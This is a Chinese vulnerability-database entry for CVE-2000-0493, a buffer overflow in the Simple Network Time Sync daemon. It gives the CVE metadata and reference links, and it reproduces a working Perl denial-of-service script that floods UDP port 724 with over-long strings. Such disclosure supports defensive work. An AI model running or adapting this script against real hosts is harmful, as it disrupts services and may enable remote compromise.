Simple Network Time Sync守护进程缓冲区溢出漏洞-安全小百科

Simple Network Time Sync守护进程缓冲区溢出漏洞

漏洞ID	1105866	漏洞类型	缓冲区溢出
发布时间	2000-06-01	更新时间	2005-05-02
CVE编号	CVE-2000-0493	CNNVD-ID	CNNVD-200006-008
漏洞平台	Linux	CVSS评分	10.0

|漏洞来源

https://www.exploit-db.com/exploits/19978
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-008

|漏洞详情

TimeSync守护进程存在缓冲区溢出漏洞。远程攻击者借助超长字符串导致拒绝服务或执行任意命令。

|漏洞EXP

source: http://www.securityfocus.com/bid/1289/info

A scanf overflow has been discovered in the Simple Network Time Sync daemon and client version 1.0. Currently the buffer overflow has been tested on RedHat 6.1. It may be possible to obtain root, although it appears one only has 50 characters to run code with.

#!/usr/bin/perl -w
#
# Usage: ./kill_sntsd <hostname>
#

use Socket;

send_packet(); # Needs to send 2 packets to kill the client and the server 
daemons
send_packet();

sub send_packet {

$proto = getprotobyname('udp');
$localaddr = gethostbyname("localhost") || die "error: $!n";
$iaddr = gethostbyname($ARGV[0]) || die "$!n";
$sin = sockaddr_in(724, $iaddr);
$paddr = sockaddr_in(53, $localaddr);
socket(SH, PF_INET, SOCK_DGRAM, $proto);
bind(SH, $paddr);

$|=1;

connect(SH, $sin) || die "$!n";

# A string longer than 50 characters...
print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistixn";
close(SH);

}

|参考资料

来源:XF
名称:timesync-bo-execute
链接:http://xforce.iss.net/static/4602.php
来源:VULN-DEV
名称:20000601VulnerabilityinSNTS
链接:http://archives.neohapsis.com/archives/vuln-dev/2000-q2/0843.html
来源:BID
名称:1289
链接:http://www.securityfocus.com/bid/1289

相关推荐: Allaire JRun 3.0 Servlet – Denial of Service

Allaire JRun 3.0 Servlet – Denial of Service 漏洞ID 1053472 漏洞类型发布时间 2000-10-31 更新时间 2000-10-31 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Multipl…

文章版权归作者所有，未经允许请勿转载。

THE END